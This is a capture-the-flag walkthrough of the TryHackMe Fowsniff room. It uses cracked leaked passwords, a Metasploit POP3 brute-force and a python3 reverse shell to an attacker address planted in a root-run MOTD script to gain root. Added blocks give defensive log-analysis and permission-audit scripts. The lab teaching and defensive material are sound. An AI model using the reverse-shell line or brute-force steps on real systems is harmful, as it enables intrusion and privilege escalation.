Fowsniff CTF(Tryhackme) Room Walkthrough By Jonty Bhardwaj

Jonty Bhardwaj
5 min read, Jul 5, 2021

Hello Reader, I am Jonty Bhardwaj, currently enrolled in the Master Certificate in Cyber Security HackerU program. Today I am here to share a writeup on a TryHackMe machine called Fowsniff CTF.

First of all, we navigate to the room URL and join it.

https://tryhackme.com/room/ctf

After starting the machine we first connect through OpenVPN and ping the IP we are given to check that the connection is established. Once the machine answers, we start the fun part: pentesting and getting root privileges.

First we run an Nmap scan to see which ports and services are open on the machine.

nmap -sV -sT -T4 -A 10.10.168.80

We can see that 4 ports are open, and the most promising one for gathering information looks to be port 80. Let's see what's on the website.

From the website we gathered that this corporation was hacked recently and that employee credentials have been dumped publicly on its compromised Twitter handle, @fowsniffcorp.

Let's check the Twitter handle for more information and maybe obtain the leaked credentials ourselves, in case some employee was too lazy to change their password.

https://twitter.com/fowsniffcorp?lang=en

From the Twitter handle we learned that the corporation was hacked by someone named B1gN1nj4.

From the following tweet we also know that the user stone is the sysadmin.

It also contained a Pastebin dump of employee credentials.

Cracking the MD5 hashes, we got these passwords:

mauer@fowsniff: mailcall

mustikka@fowsniff: bilbo101

tegel@fowsniff: apples01

baksteen@fowsniff: skyler22

seina@fowsniff: scoobydoo2

stone@fowsniff: Not Found

mursten@fowsniff: carp4ever

parede@fowsniff: orlando12

sciana@fowsniff: 07011972

From this Pastebin info we gathered many credentials, which may or may not have been changed since, plus a note that the POP3 server is wide open to be exploited. Looking at our Nmap scan, the POP3 server is indeed still open.

We then created a user file and a password file from the known credentials to feed the brute-force.

Let's try the POP3 server ourselves by brute-forcing it with a Metasploit module.

msfconsole

use auxiliary/scanner/pop3/pop3_login

show options

set USER_FILE /root/userfile.txt

set PASS_FILE /root/passfile.txt

set RHOSTS 10.10.122.193

run

We got a valid set of credentials.
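Added here as the defender-side counterpart, not part of the original walkthrough: the brute-force above leaves a distinctive trail in the mail server's auth log, many usernames failing from one source address followed by a success. The Dovecot-style log lines below are constructed for the demo, not captured from the room, and the source addresses are documentation ranges.

```shell
# Constructed sample of Dovecot pop3-login auth records (not from the room).
SAMPLE_LOG='Jul  5 10:01:02 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mauer>, method=PLAIN, rip=203.0.113.7, lip=10.10.168.80
Jul  5 10:01:03 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mustikka>, method=PLAIN, rip=203.0.113.7, lip=10.10.168.80
Jul  5 10:01:04 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<tegel>, method=PLAIN, rip=203.0.113.7, lip=10.10.168.80
Jul  5 10:01:05 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<baksteen>, method=PLAIN, rip=203.0.113.7, lip=10.10.168.80
Jul  5 10:01:06 mail dovecot: pop3-login: Login: user=<seina>, method=PLAIN, rip=203.0.113.7, lip=10.10.168.80
Jul  5 10:30:00 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<stone>, method=PLAIN, rip=198.51.100.9, lip=10.10.168.80
Jul  5 10:31:00 mail dovecot: pop3-login: Login: user=<stone>, method=PLAIN, rip=198.51.100.9, lip=10.10.168.80'

# failures_from IP -> number of failed POP3 logins from that source address
failures_from() {
  printf '%s\n' "$SAMPLE_LOG" | awk -v ip="$1" '
    /auth failed/ && index($0, "rip=" ip ",") { n++ }
    END { print n + 0 }'
}

# users_tried_from IP -> how many distinct usernames that source failed on.
# Many users with one or two tries each is a leaked credential list being replayed,
# which is exactly what a USER_FILE/PASS_FILE run looks like from the server side.
users_tried_from() {
  printf '%s\n' "$SAMPLE_LOG" | awk -v ip="$1" '
    /auth failed/ && index($0, "rip=" ip ",") {
      u = $0; sub(/.*user=</, "", u); sub(/>.*/, "", u); seen[u] = 1 }
    END { n = 0; for (k in seen) n++; print n }'
}

# guessing_sources THRESHOLD -> source addresses with at least THRESHOLD failures
# that then logged in successfully: the signature of a leaked password that still works
guessing_sources() {
  printf '%s\n' "$SAMPLE_LOG" | awk -v t="$1" '
    { ip = $0; sub(/.*rip=/, "", ip); sub(/,.*/, "", ip) }
    /auth failed/ { fails[ip]++ }
    /Login:/      { ok[ip] = 1 }
    END { for (ip in fails) if (fails[ip] >= t && ok[ip]) print ip }'
}
```

On a real server, replace SAMPLE_LOG with the contents of the mail log and raise the threshold to match normal typo rates; a single source failing on four different accounts and then succeeding is the case worth an alert and a forced password reset.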

Connecting to POP3 with the credentials to read the mails:

nc 10.10.168.80 110

USER seina

PASS scoobydoo2

LIST

Here we can see that there are 2 mails; let's read them with the command

RETR 1

As you can see, we have got an SSH password: S1ck3nBluff+secureshell

We also checked the second mail and learned that the user baksteen sent it to seina saying he was sick. So he might not have come to the office, and his password may still be the same temporary password.

Let's try to log in over SSH as user baksteen with the temporary password.

ssh baksteen@10.10.168.80

And voilà, we have access to user baksteen's workspace.

After searching we found a file named term.txt.

cat term.txt

The file suggests that we look for other phrases by the person who coined the term "One Hit Wonder".

We then searched for files belonging to the users group, which our user can reach:

find / -type f -group users 2>/dev/null

Right at the start of the output we found an interesting shell script; let's see if we can use this file to get a reverse shell.

So now we will try to use this file to run our reverse shell.

which python3

We can see that python3 is installed, so a python3 reverse shell will work.

nano cube.sh

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.107.42",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We have successfully placed a Python reverse shell in the script, but we need someone with higher privileges to run it, or another higher-privileged file that executes the script, in order to escalate our privileges.

We know that when we connect via SSH, cube.sh is executed to print the Fowsniff Corp banner, and cube.sh is called from another script. Maybe we can find the controlling script.

cd /etc/update-motd.d/

As we can see, there is a script named 00-header which calls the cube.sh script.

These files are owned by root; a normal user has only read and execute permissions on them.

Now if we log in again over SSH, the new cube.sh will be executed by the 00-header script with root permissions, and we will get a reverse shell back with root privileges.
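The root cause here is a root-run MOTD script calling a file that the users group can write. Added as an admin-side check, not part of the original walkthrough: a small audit that walks an update-motd.d directory and reports every absolute path a script references that is group- or world-writable. The demo builds a throwaway copy of the layout under a temp directory (paths and file names are constructed), with one header script that calls a group-writable cube.sh and one that calls a correctly locked-down script.

```shell
# motd_writable_deps DIR -> prints "script -> dependency" for every absolute path
# referenced by a script in DIR that some non-owner (group or other) may write.
# Root runs these scripts at login, so any such dependency is a privilege boundary.
motd_writable_deps() {
  dir=$1
  for script in "$dir"/*; do
    [ -f "$script" ] || continue
    # every absolute-path token in the script text (e.g. /opt/cube/cube.sh)
    grep -o '/[A-Za-z0-9_./-]*' "$script" | sort -u | while read -r dep; do
      [ -f "$dep" ] || continue
      # -L follows symlinks such as /bin/sh so the target's mode is checked
      if [ -n "$(find -L "$dep" -type f \( -perm -g+w -o -perm -o+w \) 2>/dev/null)" ]; then
        printf '%s -> %s\n' "$script" "$dep"
      fi
    done
  done
}

# build_demo -> constructs a demo tree mirroring the room's layout and prints its root:
# 00-header runs a group-writable cube.sh (the bug), 10-safe runs a 0755 script (fine)
build_demo() {
  root=$(mktemp -d)
  mkdir -p "$root/etc/update-motd.d" "$root/opt/cube"
  printf '#!/bin/sh\necho banner\n' > "$root/opt/cube/cube.sh"
  chmod 775 "$root/opt/cube/cube.sh"          # group members can replace the contents
  printf '#!/bin/sh\nsh %s\n' "$root/opt/cube/cube.sh" > "$root/etc/update-motd.d/00-header"
  printf '#!/bin/sh\necho ok\n' > "$root/opt/safe.sh"
  chmod 755 "$root/opt/safe.sh"               # only the owner may write
  printf '#!/bin/sh\nsh %s\n' "$root/opt/safe.sh" > "$root/etc/update-motd.d/10-safe"
  printf '%s\n' "$root"
}

# demo_findings -> number of flagged script/dependency pairs in the demo tree (expect 1)
demo_findings() {
  root=$(build_demo)
  motd_writable_deps "$root/etc/update-motd.d" | wc -l | tr -d ' '
  rm -rf "$root"
}
```

Run motd_writable_deps /etc/update-motd.d on a real host; the fix for anything it reports is chmod 755 and root ownership on the dependency, or dropping the call from the MOTD script entirely.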

Now logging back in over SSH:

ssh baksteen@10.10.70.63

As soon as we log in as user baksteen, we get a reverse shell on our listener with root privileges:

nc -lnvp 4444

cat /root/flag.txt

We have successfully escalated to a root shell using this trick and found the root flag in the root folder.

Proof of Completion


Jonty Bhardwaj

Avid learner and writer trying to gain as much knowledge as possible in the domain of cyber security while sharing my learning to help other people like myself.